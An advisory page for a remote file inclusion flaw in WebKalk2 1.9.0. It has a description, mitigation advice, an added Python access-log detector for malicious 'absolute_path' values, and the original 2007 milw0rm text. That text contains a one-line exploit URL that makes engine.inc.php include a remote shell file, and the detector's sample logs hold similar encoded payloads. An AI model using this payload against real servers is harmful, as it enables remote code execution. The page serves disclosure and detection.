Vendor: WebKalk2
By: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: WebKalk2
Affected Version From: WebKalk2 version 1.9.0
Affected Version To: WebKalk2 version 1.9.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebKalk2 1.9.0 Remote File Include Vulnerability

WebKalk2 version 1.9.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by manipulating the 'absolute_path' parameter of the 'engine.inc.php' file, causing the script to include arbitrary files from a remote server.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate the risk, it is recommended to upgrade to a newer version of WebKalk2 or implement a web application firewall to filter out malicious requests.
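
The filtering idea above can also be applied after the fact to web server access logs. The following detector is an added example, not part of the original advisory or of WebKalk2; the combined log format, the /webkalk2/ install path, the sample hosts, and the rule that any client-supplied 'absolute_path' is suspicious are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter named in the advisory.
SCRIPT = "/engine/engine.inc.php"
PARAM = "absolute_path"

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')    # request line of a log entry
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)  # value starts with a URL scheme

# Constructed sample entries; install path and hosts are assumptions.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Apr/2007:10:01:02 +0000] "GET /webkalk2/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Apr/2007:10:01:09 +0000] "GET /webkalk2/engine/engine.inc.php'
    '?absolute_path=http://files.example/Shell.txt? HTTP/1.1" 200 312',
    '198.51.100.4 - - [12/Apr/2007:10:02:30 +0000] "GET /webkalk2/engine/engine.inc.php'
    '?absolute_path=http%253A%252F%252Ffiles.example%252Fa.txt HTTP/1.0" 200 98',
    '198.51.100.9 - - [12/Apr/2007:10:03:11 +0000] "GET /webkalk2/engine/engine.inc.php'
    '?absolute_path=/var/www/webkalk2/ HTTP/1.1" 200 40',
]

def classify(line):
    """Return 'remote', 'supplied' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if SCRIPT not in unquote(url.path).lower():
        return None
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != PARAM:
            continue
        verdict = verdict or "supplied"   # include path set by the client at all
        for _ in range(3):                # undo nested percent-encoding
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if SCHEME_RE.match(value):
            verdict = "remote"            # include path points at a URL
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged entry."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v]

if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: {v}")
```

Access logs do not record POST bodies, so this check covers the query string only.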

Exploit-DB raw data:

# WebKalk2 1.9.0 Remote File Include Vulnerability
# D.Script: http://www.linuxdelta.de/uploads/media/webkalk2-1.9.0.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/engine/engine.inc.php?absolute_path=Shell.txt?
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# ThanX  To: G0T-ROOT.Net & bd0rk ;)

# milw0rm.com [2007-04-12]